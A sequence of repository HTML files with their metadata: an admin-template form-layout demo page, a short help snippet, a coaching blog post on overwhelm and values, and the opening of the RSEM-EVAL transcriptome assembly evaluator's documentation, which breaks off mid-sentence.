<span class="text"> Sed diam nonumy... </span> </a> </li> <li> <a href="javascript:void(0);"> <span class="photo"> <img src="assets/img/demo/avatar-3.jpg" alt="" /> </span> <span class="subject"> <span class="from"> Patrick Nilson </span> <span class="time"> 6 hours </span> </span> <span class="text"> No sea takimata sanctus... </span> </a> </li> <li class="footer"> <a href="javascript:void(0);"> View all messages </a> </li> </ul> </li> <li> <a href="#" class="dropdown-toggle row-bg-toggle"> <i class="icon-resize-vertical"> </i> </a> </li> <li class="dropdown"> <a href="#" class="project-switcher-btn dropdown-toggle"> <i class="icon-folder-open"> </i> <span> Projects </span> </a> </li> <li class="dropdown user"> <a href="#" class="dropdown-toggle" data-toggle="dropdown"> <i class="icon-male"> </i> <span class="username"> John Doe </span> <i class="icon-caret-down small"> </i> </a> <ul class="dropdown-menu"> <li> <a href="pages_user_profile.html"> <i class="icon-user"> </i> My Profile </a> </li> <li> <a href="pages_calendar.html"> <i class="icon-calendar"> </i> My Calendar </a> </li> <li> <a href="#"> <i class="icon-tasks"> </i> My Tasks </a> </li> <li class="divider"> </li> <li> <a href="login.html"> <i class="icon-key"> </i> Log Out </a> </li> </ul> </li> </ul> </div> <div id="project-switcher" class="container project-switcher"> <div id="scrollbar"> <div class="handle"> </div> </div> <div id="frame"> <ul class="project-list"> <li> <a href="javascript:void(0);"> <span class="image"> <i class="icon-desktop"> </i> </span> <span class="title"> Lorem ipsum dolor </span> </a> </li> <li> <a href="javascript:void(0);"> <span class="image"> <i class="icon-compass"> </i> </span> <span class="title"> Dolor sit invidunt </span> </a> </li> <li class="current"> <a href="javascript:void(0);"> <span class="image"> <i class="icon-male"> </i> </span> <span class="title"> Consetetur sadipscing elitr </span> </a> </li> <li> <a href="javascript:void(0);"> <span class="image"> <i class="icon-thumbs-up"> </i> </span> <span class="title"> Sed diam nonumy </span> </a> </li> <li> <a href="javascript:void(0);"> <span class="image"> <i class="icon-female"> </i> </span> <span class="title"> At vero eos et </span> </a> </li> <li> <a href="javascript:void(0);"> <span class="image"> <i class="icon-beaker"> </i> </span> <span class="title"> Sed diam voluptua </span> </a> </li> <li> <a href="javascript:void(0);"> <span class="image"> <i class="icon-desktop"> </i> </span> <span class="title"> Lorem ipsum dolor </span> </a> </li> <li> <a href="javascript:void(0);"> <span class="image"> <i class="icon-compass"> </i> </span> <span class="title"> Dolor sit invidunt </span> </a> </li> <li> <a href="javascript:void(0);"> <span class="image"> <i class="icon-male"> </i> </span> <span class="title"> Consetetur sadipscing elitr </span> </a> </li> <li> <a href="javascript:void(0);"> <span class="image"> <i class="icon-thumbs-up"> </i> </span> <span class="title"> Sed diam nonumy </span> </a> </li> <li> <a href="javascript:void(0);"> <span class="image"> <i class="icon-female"> </i> </span> <span class="title"> At vero eos et </span> </a> </li> <li> <a href="javascript:void(0);"> <span class="image"> <i class="icon-beaker"> </i> </span> <span class="title"> Sed diam voluptua </span> </a> </li> </ul> </div> </div> </header> <div id="container"> <div id="sidebar" class="sidebar-fixed"> <div id="sidebar-content"> <form class="sidebar-search"> <div class="input-box"> <button type="submit" class="submit"> <i class="icon-search"> </i> </button> <span> <input type="text" placeholder="Search..."> </span> </div> </form> <div class="sidebar-search-results"> <i class="icon-remove close"> </i> <div class="title"> Documents </div> <ul class="notifications"> <li> <a href="javascript:void(0);"> <div class="col-left"> <span class="label label-info"> <i class="icon-file-text"> </i> </span> </div> <div class="col-right with-margin"> <span class="message"> <strong> John Doe </strong> received $1.527,32 </span> <span class="time"> finances.xls </span> </div> </a> </li> <li> <a href="javascript:void(0);"> <div class="col-left"> <span class="label label-success"> <i class="icon-file-text"> </i> </span> </div> <div class="col-right with-margin"> <span class="message"> My name is <strong> John Doe </strong> ... </span> <span class="time"> briefing.docx </span> </div> </a> </li> </ul> <div class="title"> Persons </div> <ul class="notifications"> <li> <a href="javascript:void(0);"> <div class="col-left"> <span class="label label-danger"> <i class="icon-female"> </i> </span> </div> <div class="col-right with-margin"> <span class="message"> Jane <strong> Doe </strong> </span> <span class="time"> 21 years old </span> </div> </a> </li> </ul> </div> <ul id="nav"> <li> <a href="index.html"> <i class="icon-dashboard"> </i> Dashboard </a> </li> <li> <a href="javascript:void(0);"> <i class="icon-desktop"> </i> UI Features <span class="label label-info pull-right"> 6 </span> </a> <ul class="sub-menu"> <li> <a href="ui_general.html"> <i class="icon-angle-right"> </i> General </a> </li> <li> <a href="ui_buttons.html"> <i class="icon-angle-right"> </i> Buttons </a> </li> <li> <a href="ui_tabs_accordions.html"> <i class="icon-angle-right"> </i> Tabs &amp; Accordions </a> </li> <li> <a href="ui_sliders.html"> <i class="icon-angle-right"> </i> Sliders </a> </li> <li> <a href="ui_nestable_list.html"> <i class="icon-angle-right"> </i> Nestable List </a> </li> <li> <a href="ui_typography.html"> <i class="icon-angle-right"> </i> Typography / Icons </a> </li> <li> <a href="ui_google_maps.html"> <i class="icon-angle-right"> </i> Google Maps </a> </li> <li> <a href="ui_grid.html"> <i class="icon-angle-right"> </i> Grid </a> </li> </ul> </li> <li class="current open"> <a href="javascript:void(0);"> <i class="icon-edit"> </i> Form Elements </a> <ul class="sub-menu"> <li> <a href="form_components.html"> <i class="icon-angle-right"> </i> Form Components </a> </li> <li class="current"> <a href="form_layouts.html"> <i class="icon-angle-right"> </i> Form Layouts </a> </li> <li> <a href="form_validation.html"> <i class="icon-angle-right"> </i> Form Validation </a> </li> <li> <a href="form_wizard.html"> <i class="icon-angle-right"> </i> Form Wizard </a> </li> </ul> </li> <li> <a href="javascript:void(0);"> <i class="icon-table"> </i> Tables </a> <ul class="sub-menu"> <li> <a href="tables_static.html"> <i class="icon-angle-right"> </i> Static Tables </a> </li> <li> <a href="http://envato.stammtec.de/themeforest/melon/tables_dynamic.html"> <i class="icon-angle-right"> </i> Dynamic Tables (DataTables) </a> </li> <li> <a href="tables_responsive.html"> <i class="icon-angle-right"> </i> Responsive Tables </a> </li> </ul> </li> <li> <a href="charts.html"> <i class="icon-bar-chart"> </i> Charts &amp; Statistics </a> </li> <li> <a href="javascript:void(0);"> <i class="icon-folder-open-alt"> </i> Pages </a> <ul class="sub-menu"> <li> <a href="login.html"> <i class="icon-angle-right"> </i> Login </a> </li> <li> <a href="pages_user_profile.html"> <i class="icon-angle-right"> </i> User Profile </a> </li> <li> <a href="pages_calendar.html"> <i class="icon-angle-right"> </i> Calendar </a> </li> <li> <a href="pages_invoice.html"> <i class="icon-angle-right"> </i> Invoice </a> </li> <li> <a href="404.html"> <i class="icon-angle-right"> </i> 404 Page </a> </li> </ul> </li> <li> <a href="javascript:void(0);"> <i class="icon-list-ol"> </i> 4 Level Menu </a> <ul class="sub-menu"> <li class="open-default"> <a href="javascript:void(0);"> <i class="icon-cogs"> </i> Item 1 <span class="arrow"> </span> </a> <ul class="sub-menu"> <li class="open-default"> <a href="javascript:void(0);"> <i class="icon-user"> </i> Sample Link 1 <span class="arrow"> </span> </a> <ul class="sub-menu"> <li class="current"> <a href="javascript:void(0);"> <i class="icon-remove"> </i> Sample Link 1 </a> </li> <li> <a href="javascript:void(0);"> <i class="icon-pencil"> </i> Sample Link 1 </a> </li> <li> <a href="javascript:void(0);"> <i class="icon-edit"> </i> Sample Link 1 </a> </li> </ul> </li> <li> <a href="javascript:void(0);"> <i class="icon-user"> </i> Sample Link 1 </a> </li> <li> <a href="javascript:void(0);"> <i class="icon-external-link"> </i> Sample Link 2 </a> </li> <li> <a href="javascript:void(0);"> <i class="icon-bell"> </i> Sample Link 3 </a> </li> </ul> </li> <li> <a href="javascript:void(0);"> <i class="icon-globe"> </i> Item 2 <span class="arrow"> </span> </a> <ul class="sub-menu"> <li> <a href="javascript:void(0);"> <i class="icon-user"> </i> Sample Link 1 </a> </li> <li> <a href="javascript:void(0);"> <i class="icon-external-link"> </i> Sample Link 1 </a> </li> <li> <a href="javascript:void(0);"> <i class="icon-bell"> </i> Sample Link 1 </a> </li> </ul> </li> <li> <a href="javascript:void(0);"> <i class="icon-folder-open"> </i> Item 3 </a> </li> </ul> </li> </ul> <div class="sidebar-title"> <span> Notifications </span> </div> <ul class="notifications demo-slide-in"> <li style="display: none;"> <div class="col-left"> <span class="label label-danger"> <i class="icon-warning-sign"> </i> </span> </div> <div class="col-right with-margin"> <span class="message"> Server <strong> #512 </strong> crashed. </span> <span class="time"> few seconds ago </span> </div> </li> <li style="display: none;"> <div class="col-left"> <span class="label label-info"> <i class="icon-envelope"> </i> </span> </div> <div class="col-right with-margin"> <span class="message"> <strong> John </strong> sent you a message </span> <span class="time"> few second ago </span> </div> </li> <li> <div class="col-left"> <span class="label label-success"> <i class="icon-plus"> </i> </span> </div> <div class="col-right with-margin"> <span class="message"> <strong> Emma </strong> 's account was created </span> <span class="time"> 4 hours ago </span> </div> </li> </ul> <div class="sidebar-widget align-center"> <div class="btn-group" data-toggle="buttons" id="theme-switcher"> <label class="btn active"> <input type="radio" name="theme-switcher" data-theme="bright"> <i class="icon-sun"> </i> Bright </label> <label class="btn"> <input type="radio" name="theme-switcher" data-theme="dark"> <i class="icon-moon"> </i> Dark </label> </div> </div> </div> <div id="divider" class="resizeable"> </div> </div> <div id="content"> <div class="container"> <div class="crumbs"> <ul id="breadcrumbs" class="breadcrumb"> <li> <i class="icon-home"> </i> <a href="index.html"> Dashboard </a> </li> <li class="current"> <a href="pages_calendar.html" title=""> Calendar </a> </li> </ul> <ul class="crumb-buttons"> <li> <a href="charts.html" title=""> <i class="icon-signal"> </i> <span> Statistics </span> </a> </li> <li class="dropdown"> <a href="#" title="" data-toggle="dropdown"> <i class="icon-tasks"> </i> <span> Users <strong> (+3) </strong> </span> <i class="icon-angle-down left-padding"> </i> </a> <ul class="dropdown-menu pull-right"> <li> <a href="form_components.html" title=""> <i class="icon-plus"> </i> Add new User </a> </li> <li> <a href="http://envato.stammtec.de/themeforest/melon/tables_dynamic.html" title=""> <i class="icon-reorder"> </i> Overview </a> </li> </ul> </li> <li class="range"> <a href="#"> <i class="icon-calendar"> </i> <span> </span> <i class="icon-angle-down"> </i> </a> </li> </ul> </div> <div class="page-header"> <div class="page-title"> <h3> Form Layouts </h3> <span> Good morning, John! </span> </div> <ul class="page-stats"> <li> <div class="summary"> <span> New orders </span> <h3> 17,561 </h3> </div> <div id="sparkline-bar" class="graph sparkline hidden-xs"> 20,15,8,50,20,40,20,30,20,15,30,20,25,20 </div> </li> <li> <div class="summary"> <span> My balance </span> <h3> $21,561.21 </h3> </div> <div id="sparkline-bar2" class="graph sparkline hidden-xs"> 20,15,8,50,20,40,20,30,20,15,30,20,25,20 </div> </li> </ul> </div> <div class="row"> <div class="col-md-12"> <div class="widget box"> <div class="widget-header"> <h4> <i class="icon-reorder"> </i> Horizontal Forms </h4> </div> <div class="widget-content"> <form class="form-horizontal row-border" action="#"> <div class="form-group"> <label class="col-md-2 control-label"> Full width input: </label> <div class="col-md-10"> <input type="text" name="regular" class="form-control"> </div> </div> <div class="form-group"> <label class="col-md-2 control-label"> Multiple inputs: </label> <div class="col-md-10"> <div class="row"> <div class="col-md-4"> <input type="text" name="regular" class="form-control"> <span class="help-block"> Left aligned helper </span> </div> <div class="col-md-4"> <input type="text" name="regular" class="form-control"> <span class="help-block align-center"> Centered helper </span> </div> <div class="col-md-4"> <input type="text" name="regular" class="form-control"> <span class="help-block align-right"> Right aligned helper </span> </div> </div> </div> </div> <div class="form-group"> <label class="col-md-2 control-label"> Predefined width: </label> <div class="col-md-10"> <input class="form-control input-width-mini" type="text" placeholder=".input-width-mini" style="display: block;"> <input class="form-control input-width-small" type="text" placeholder=".input-width-small" style="display: block; margin-top: 6px;"> <input class="form-control input-width-medium" type="text" placeholder=".input-width-medium" style="display: block; margin-top: 6px;"> <input class="form-control input-width-large" type="text" placeholder=".input-width-large" style="display: block; margin-top: 6px;"> <input class="form-control input-width-xlarge" type="text" placeholder=".input-width-xlarge" style="display: block; margin-top: 6px;"> <input class="form-control input-width-xxlarge" type="text" placeholder=".input-width-xxlarge" style="display: block; margin-top: 6px;"> <input class="form-control input-block-level" type="text" placeholder=".input-block-level" style="display: block; margin-top: 6px;"> </div> </div> <div class="form-group"> <label class="col-md-2 control-label"> Select: </label> <div class="col-md-10"> <div class="row"> <div class="col-md-4"> <select class="form-control" name="select"> <option value="opt1"> col-md-4 </option> <option value="opt2"> Option 2 </option> <option value="opt3"> Option 3 </option> </select> </div> </div> <div class="row next-row"> <div class="col-md-6"> <select class="form-control" name="select"> <option value="opt1"> col-md-6 </option> <option value="opt2"> Option 2 </option> <option value="opt3"> Option 3 </option> </select> </div> </div> <div class="row next-row"> <div class="col-md-8"> <select class="form-control" name="select"> <option value="opt1"> col-md-8 </option> <option value="opt2"> Option 2 </option> <option value="opt3"> Option 3 </option> </select> </div> </div> <div class="row next-row"> <div class="col-md-12"> <select class="form-control" name="select"> <option value="opt1"> col-md-12 </option> <option value="opt2"> Option 2 </option> <option value="opt3"> Option 3 </option> </select> </div> </div> </div> </div> </form> </div> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="widget box"> <div class="widget-header"> <h4> <i class="icon-reorder"> </i> Vertical Forms </h4> </div> <div class="widget-content"> <form class="form-vertical row-border" action="#"> <div class="form-group"> <label class="control-label"> Full width input: </label> <input type="text" name="regular" class="form-control"> </div> <div class="form-group"> <label class="control-label"> Multiple inputs: </label> <div class="row"> <div class="col-md-4"> <input type="text" name="regular" class="form-control"> <span class="help-block"> Left aligned helper </span> </div> <div class="col-md-4"> <input type="text" name="regular" class="form-control"> <span class="help-block align-center"> Centered helper </span> </div> <div class="col-md-4"> <input type="text" name="regular" class="form-control"> <span class="help-block align-right"> Right aligned helper </span> </div> </div> </div> <div class="form-group"> <label class="control-label"> Predefined width: </label> <input class="form-control input-width-mini" type="text" placeholder=".input-width-mini" style="display: block;"> <input class="form-control input-width-small" type="text" placeholder=".input-width-small" style="display: block; margin-top: 6px;"> <input class="form-control input-width-medium" type="text" placeholder=".input-width-medium" style="display: block; margin-top: 6px;"> <input class="form-control input-width-large" type="text" placeholder=".input-width-large" style="display: block; margin-top: 6px;"> <input class="form-control input-width-xlarge" type="text" placeholder=".input-width-xlarge" style="display: block; margin-top: 6px;"> <input class="form-control input-width-xxlarge" type="text" placeholder=".input-width-xxlarge" style="display: block; margin-top: 6px;"> <input class="form-control input-block-level" type="text" placeholder=".input-block-level" style="display: block; margin-top: 6px;"> </div> <div class="form-group"> <label class="control-label"> Select: </label> <div class="row"> <div class="col-md-4"> <select class="form-control" name="select"> <option value="opt1"> col-md-4 </option> <option value="opt2"> Option 2 </option> <option value="opt3"> Option 3 </option> </select> </div> </div> <div class="row next-row"> <div class="col-md-6"> <select class="form-control" name="select"> <option value="opt1"> col-md-6 </option> <option value="opt2"> Option 2 </option> <option value="opt3"> Option 3 </option> </select> </div> </div> <div class="row next-row"> <div class="col-md-8"> <select class="form-control" name="select"> <option value="opt1"> col-md-8 </option> <option value="opt2"> Option 2 </option> <option value="opt3"> Option 3 </option> </select> </div> </div> <div class="row next-row"> <div class="col-md-12"> <select class="form-control" name="select"> <option value="opt1"> col-md-12 </option> <option value="opt2"> Option 2 </option> <option value="opt3"> Option 3 </option> </select> </div> </div> </div> </form> </div> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="widget box"> <div class="widget-header"> <h4> <i class="icon-reorder"> </i> Form Grid </h4> </div> <div class="widget-content"> <form class="form-vertical" action="#"> <div class="form-group"> <div class="row"> <div class="col-md-12"> <input type="text" name="regular" class="form-control" placeholder=".col-md-12"> </div> </div> </div> <div class="form-group"> <div class="row"> <div class="col-md-11"> <input type="text" name="regular" class="form-control" placeholder=".col-md-11"> </div> <div class="col-md-1"> <input type="text" name="regular" class="form-control" placeholder=".col-md-1"> </div> </div> </div> <div class="form-group"> <div class="row"> <div class="col-md-10"> <input type="text" name="regular" class="form-control" placeholder=".col-md-10"> </div> <div class="col-md-2"> <input type="text" name="regular" class="form-control" placeholder=".col-md-2"> </div> </div> </div> <div class="form-group"> <div class="row"> <div class="col-md-9"> <input type="text" name="regular" class="form-control" placeholder=".col-md-9"> </div> <div class="col-md-3"> <input type="text" name="regular" class="form-control" placeholder=".col-md-3"> </div> </div> </div> <div class="form-group"> <div class="row"> <div class="col-md-8"> <input type="text" name="regular" class="form-control" placeholder=".col-md-8"> </div> <div class="col-md-4"> <input type="text" name="regular" class="form-control" placeholder=".col-md-4"> </div> </div> </div> <div class="form-group"> <div class="row"> <div class="col-md-7"> <input type="text" name="regular" class="form-control" placeholder=".col-md-7"> </div> <div class="col-md-5"> <input type="text" name="regular" class="form-control" placeholder=".col-md-5"> </div> </div> </div> <div class="form-group"> <div class="row"> <div class="col-md-6"> <input type="text" name="regular" class="form-control" placeholder=".col-md-6"> </div> <div class="col-md-6"> <input type="text" name="regular" class="form-control" placeholder=".col-md-6"> </div> </div> </div> <div class="form-group"> <div class="row"> <div class="col-md-5"> <input type="text" name="regular" class="form-control" placeholder=".col-md-5"> </div> <div class="col-md-7"> <input type="text" name="regular" class="form-control" placeholder=".col-md-7"> </div> </div> </div> <div class="form-group"> <div class="row"> <div class="col-md-4"> <input type="text" name="regular" class="form-control" placeholder=".col-md-4"> </div> <div class="col-md-8"> <input type="text" name="regular" class="form-control" placeholder=".col-md-8"> </div> </div> </div> <div class="form-group"> <div class="row"> <div class="col-md-3"> <input type="text" name="regular" class="form-control" placeholder=".col-md-3"> </div> <div class="col-md-9"> <input type="text" name="regular" class="form-control" placeholder=".col-md-9"> </div> </div> </div> <div class="form-group"> <div class="row"> <div class="col-md-2"> <input type="text" name="regular" class="form-control" placeholder=".col-md-2"> </div> <div class="col-md-10"> <input type="text" name="regular" class="form-control" placeholder=".col-md-10"> </div> </div> </div> <div class="form-group"> <div class="row"> <div class="col-md-1"> <input type="text" name="regular" class="form-control" placeholder=".col-md-1"> </div> <div class="col-md-11"> <input type="text" name="regular" class="form-control" placeholder=".col-md-11"> </div> </div> </div> </form> </div> </div> </div> </div> </div> </div> </div> </body> </html>
zhangyage/Python-oldboy
day10/meAdmin/form_layouts.html
HTML
apache-2.0
57,776
To access the approval page, click on "Approval" in the main menu. It provides Interest Adjustments, Pending Payments and Payment Moves Approval for supervisors.
NASA-Tournament-Lab/CoECI-OPM-Service-Credit-Redeposit-Deposit-Application
Code/SCRD_BRE/src/web/help/approvalPageSubject.html
HTML
apache-2.0
162
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content="Create a life that you love."> <title>Are you trying to squeeze more into an already full life? - Quercus Coaching</title> <link rel="canonical" href="/2016/03/30/blog-march/"> <!-- Bootstrap Core CSS --> <link rel="stylesheet" href="/css/bootstrap.min.css"> <!-- Custom CSS --> <link rel="stylesheet" href="/css/clean-blog.css"> <!-- Pygments Github CSS --> <link rel="stylesheet" href="/css/syntax.css"> <!-- Custom Fonts --> <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css" rel="stylesheet" type="text/css"> <link href='//fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href='//fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/css'> <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <!-- Navigation --> <nav class="navbar navbar-default navbar-custom navbar-fixed-top"> <div class="container-fluid"> <!-- Brand and toggle get grouped for better mobile display --> <div class="navbar-header page-scroll"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="/">Quercus Coaching</a> </div> <!-- Collect the nav links, forms, and other content for toggling --> <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1"> <ul class="nav navbar-nav navbar-right"> <li><a href="/" >Home</a></li> <li><a href="/about/" >About</a></li> <li><a href="/contact/" >Contact</a></li> </ul> <!-- <li> <a href="/">Home</a> </li> <li> <a href="/404.html">Page Not Found</a> </li> <li> <a href="/about/">About</a> </li> <li> <a href="/contact/">Contact</a> </li> </ul> --> </div> <!-- /.navbar-collapse --> </div> <!-- /.container --> </nav> <!-- Post Header --> <header class="intro-header" style="background-image: url('/img/banner_photo.png')"> <div class="container"> <div class="row"> <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1"> <div class="post-heading"> <h1>Are you trying to squeeze more into an already full life?</h1> <h2 class="subheading">Have you ever noticed that so many things that could improve your life involve adding ... more?</h2> <span class="meta">Posted by Alison Macduff on March 30, 2016</span> </div> </div> </div> </div> </header> <!-- Post Content --> <article> <div class="container"> <div class="row"> <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1"> <p><em>Are you trying to squeeze more into an already full life?</em></p> <p>Have you ever noticed that so many things that could improve your life involve adding … <strong>more?</strong></p> <p><strong>For example:</strong></p> <ul> <li><strong>more</strong> time in the gym/with the kids/meditating/jogging</li> <li><strong>more</strong> information about getting fit/healthy eating/how to succeed</li> <li><strong>more</strong> attention to your loved ones/the present moment</li> <li><strong>more</strong> action around career goals/marketing yourself/searching for The One.</li> </ul> <p>However, in my experience, trying to put more into a cup which is already full just results in overflow. In our lives that can feel like overwhelm - resulting in less sleep, poor health, low self esteem, guilt and even shame.</p> <p>We are led to believe that if we only knew/did/had/were … (fill in the gap yourself) our lives would be perfect, and when we fail and end up feeling worse about ourselves – and less likely to try again.</p> <p>Part of the job of a coach is to help you empty the cup – review your life to look at what’s working and, in areas of your life which aren’t working, examine what you have been doing and what you have learnt about yourself.</p> <p>Part of emptying the cup also involves discarding the ‘shoulds’ in your life so that you are left with <u>your</u> core values – the ones that get you up in the morning. These values will be reflected in what you are committed to in life and the strengths that get you through the day.</p> <p>Coaching can act like a knife to cut away everything that isn’t <u>you</u> or aligned with <u>your</u> values. Clients experience a clarity of vision that can be exhilarating, liberating the energy trapped in previous failed attempts, to be redirected into the strengths that have already got you this far.</p> <p><u>For example</u>, who wants to lose weight? How many times have you tried and how much energy have you expended on this? However, to ‘lose weight’ covers many different areas- e.g. how healthy you feel, your size, what you eat, your shape. What would it be like to give up the idea of losing weight? How would it feel to be ok about the weight you are now? Notice how your body responds to that thought.</p> <p>Instead, what is it <u>specifically</u> that you want?</p> <ul> <li>To feel toned/fit into a size smaller?</li> <li>To feel less out of breath?</li> <li>To sleep better?</li> <li>To give up coffee/sugar/alcohol/chocolate/smoking?</li> <li>To have more energy?</li> </ul> <p><u>Choose one area</u> and look at:</p> <ul> <li>when you have tried and failed - and what you said about yourself.</li> <li>what you think you ‘should’ do/be/have in this area.</li> </ul> <p>If you gave up all the regrets/blame/sense of failure, what one step could you do today to give you a positive result in this area?</p> <p>Make it something that you enjoy, something that you are already good at or something that is aligned to a commitment you already have.</p> <p>We are filled to the brim with knowledge, but knowledge isn’t enough until it works in the service of <u>your</u> values, <u>your</u> strengths and <u>your</u> commitments. Enjoy!</p> <hr> <ul class="pager"> <li class="previous"> <a href="/2016/01/17/coaching-for-carers/" data-toggle="tooltip" data-placement="top" title="Coaching for carers">&larr; Previous Post</a> </li> <li class="next"> <a href="/2016/04/28/are_you_sabotaging_yourself/" data-toggle="tooltip" data-placement="top" title="Are you sabotaging yourself?">Next Post &rarr;</a> </li> </ul> </div> </div> </div> </article> <hr> <!-- Footer --> <footer> <div class="container"> <div class="row"> <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1"> <ul class="list-inline text-center"> <li> <a href="/feed.xml"> <span class="fa-stack fa-lg"> <i class="fa fa-square fa-stack-2x"></i> <i class="fa fa-rss fa-stack-1x fa-inverse"></i> </span> </a> </li> <li> <a href="https://github.com/akmacduff"> <span class="fa-stack fa-lg"> <i class="fa fa-square fa-stack-2x"></i> <i class="fa fa-github fa-stack-1x fa-inverse"></i> </span> </a> </li> </ul> <p class="copyright text-muted">Copyright &copy; Quercus Coaching 2016. Made using <a href="https://jekyllrb.com/">Jekyll</a> with the <a href="https://github.com/IronSummitMedia/startbootstrap-clean-blog-jekyll">startbootstrap clean blog jekyll theme</a>.</p> </div> </div> </div> </footer> <!-- jQuery --> <script src="/js/jquery.min.js "></script> <!-- Bootstrap Core JavaScript --> <script src="/js/bootstrap.min.js "></script> <!-- Custom Theme JavaScript --> <script src="/js/clean-blog.min.js "></script> </body> </html>
akmacduff/akmacduff.github.io
_site/2016/03/30/blog-march/index.html
HTML
apache-2.0
9,833
<html> <head> <title>RSEM-EVAL: A novel reference-free transcriptome assembly evaluation measure</title> <!--This file is autogenerated. Edit the template instead.--> <script type="text/x-mathjax-config"> MathJax.Hub.Config({ tex2jax: {inlineMath: [['$','$']]} }); </script> <script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_SVG" type="text/javascript"></script> <style type="text/css"> body { max-width: 50em; } body, td { font-family: sans-serif; } dt { font-family: monospace; } h1, h2 { color: #990000; } </style> </head> <body> <h1>RSEM-EVAL: A novel reference-free transcriptome assembly evaluation measure</h1> <h2><a name="introduction"></a> Introduction</h2> <p>RSEM-EVAL is built off of RSEM. It is a reference-free de novo transcriptome assembly evaluator.</p> <h2><a name="compilation"></a> Compilation &amp; Installation</h2> <p>To compile RSEM-EVAL, simply run</p> <pre><code>make </code></pre> <p>To install, simply put the rsem directory in your environment's PATH variable.</p> <h3>Prerequisites</h3> <p>C++, Perl and R are required to be installed. </p> <p>To take advantage of RSEM-EVAL's built-in support for the Bowtie alignment program, you must have <a href="http://bowtie-bio.sourceforge.net">Bowtie</a> installed.</p> <h2><a name="usage"></a> Usage</h2> <h3>I. Build an assembly from the RNA-Seq data using an assembler</h3> <p>Please note that the RNA-Seq data set used to build the assembly should be exactly the same as the RNA-Seq data set for evaluating this assembly. RSEM-EVAL supports both single-end and paired-end reads.</p> <h3>II. Estimate Transcript Length Distribution Parameters</h3> <p>RSEM-EVAL provides a script 'rsem-eval-estimate-transcript-length-distribution' to estimate transcript length distribution from a set of transcript sequences. Transcripts can be from a closely related species to the orgaism whose transcriptome is sequenced. Its usage is:</p> <pre><code>rsem-eval-estimate-transcript-length-distribution input.fasta parameter_file </code></pre> <p>__input.fasta__ is a multi-FASTA file contains all transcript sequences used to learn the true transcript length distribution's parameters. <br> __parameter_file__ records the learned parameters--the estimated mean and standard deviation (separated by a tab character).</p> <p>We have some learned paramter files stored at folder 'true_transcript_length_distribution'. Please refer to 'true_length_dist_mean_sd.txt' in the folder for more details.</p> <h3>III. Calculate the RSEM-EVAL score</h3> <p>To calculate the RSEM-EVAL score, you should use 'rsem-eval-calculate-score'. Run</p> <pre><code>rsem-eval-calculate-score --help </code></pre> <p>to get usage information.</p> <h3>IV. Outputs related to the evaluation score</h3> <p>RSEM-EVAL produces the following three score related files: 'sample_name.score', 'sample_name.score.isoforms.results' and 'sample_name.score.genes.results'.</p> <p>'sample_name.score' stores the evaluation score for the evaluated assembly. It contains 13 lines and each line contains a name and a value separated by a tab.</p> <p>The first 6 lines provide: 'Score', the RSEM-EVAL score; 'BIC_penalty', the BIC penalty term; 'Prior_score_on_contig_lengths (f function canceled)', the log score of priors of contig lengths, with f function values excluded (f function is defined in equation (4) at page 5 of Additional file 1, which is the supplementary methods, tables and figures of our DETONATE paper); 'Prior_score_on_contig_sequences', the log score of priors of contig sequence bases; 'Data_likelihood_in_log_space_without_correction', the RSEM log data likelihood calculated with contig-level read generating probabilities mentioned in section 4 of Additional file 1; 'Correction_term_(f_function_canceled)', the correction term, with f function values excluded. Score = BIC_penalty + Prior_score_on_contig_lengths + Prior_score_on_contig_sequences + Data_likelihood_in_log_space_without_correction - Correction_term. Because both 'Prior_score_on_contig_lengths' and 'Correction_term' share the same f function values for each contig, the f function values can be canceled out. Then 'Prior_score_on_contig_lengths_(f_function_canceled)' is the sum of log $c_{\lambda}(\ell)$ terms in equation (9) at page 5 of Additional file 1. 'Correction_term_(f_function_canceled)' is the sum of log $(1 - p_{\lambda_i})$ terms in equation (23) at page 9 of Additional file 1. For the correction term, we use $\lambda_i$ instead of $\lambda'_i$ to make f function canceled out.</p> <p>NOTE: Higher RSEM-EVAL scores are better than lower scores. This is true despite the fact that the scores are always negative. For example, a score of -80000 is better than a score of -200000, since -80000 &gt; -200000.</p> <p>The next 7 lines provide statistics that may help users to understand the RSEM-EVAL score better. They are: 'Number_of_contigs', the number of contigs contained in the assembly; 'Expected_number_of_aligned_reads_given_the_data', the expected number of reads assigned to each contig estimated using the contig-level read generating probabilities mentioned in section 4 of Additional file 1; 'Number_of_contigs_smaller_than_expected_read/fragment_length', the number of contigs whose length is smaller than the expected read/fragment length; 'Number_of_contigs_with_no_read_aligned_to', the number of contigs whose expected number of aligned reads is smaller than 0.005; 'Maximum_data_likelihood_in_log_space', the maximum data likelihood in log space calculated from RSEM by treating the assembly as "true" transcripts; 'Number_of_alignable_reads', the number of reads that have at least one alignment found by the aligner (Because 'rsem-calculate-expression' tries to use a very loose criteria to find alignments, reads with only low quality alignments may also be counted as alignable reads here); 'Number_of_alignments_in_total', the number of total alignments found by the aligner.</p> <p>'sample_name.score.isoforms.results' and 'sample_name.score.genes.results' output "corrected" expression levels based on contig-level read generating probabilities mentioned in section 4 of Additional file 1. Unlike 'sample_name.isoforms.results' and 'sample_name.genes.results', which are calculated by treating the contigs as true transcripts, calculating 